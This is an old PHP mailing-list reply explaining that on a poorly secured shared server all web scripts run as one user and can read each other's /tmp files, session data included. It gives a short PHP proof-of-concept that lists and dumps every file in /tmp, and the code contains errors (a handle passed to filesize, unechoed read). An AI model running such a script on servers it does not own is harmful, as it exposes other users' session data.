On 6/26/07, Al Rider <[EMAIL PROTECTED]> wrote:
I think most systems have a /tmp directory above the web dir, so
outsiders can't watch it anyhow.
True, but on an unsecured box, this becomes possible, as Apache
will most likely be running universally as `nobody`, `httpd`,
`apache`, or `daemon` for all scripts, including all web-based scripts
writing to the /tmp directory. This includes session information,
temporary .php files (as Marius requested), et cetera.
Proof of concept:
<?
if(is_dir('/tmp')) {
$handle = opendir('/tmp');
while(False !== ($ls_file = readdir($handle))) {
if(is_file('/tmp/'.$ls_file)) {
echo "==== /tmp/".$ls_file.": ====\n";
$filename = fopen('/tmp/'.$ls_file,"r");
fread($filename,filesize($filename));
echo "==== END ".$ls_file." ====\n";
}
}
}
closedir($handle);
?>
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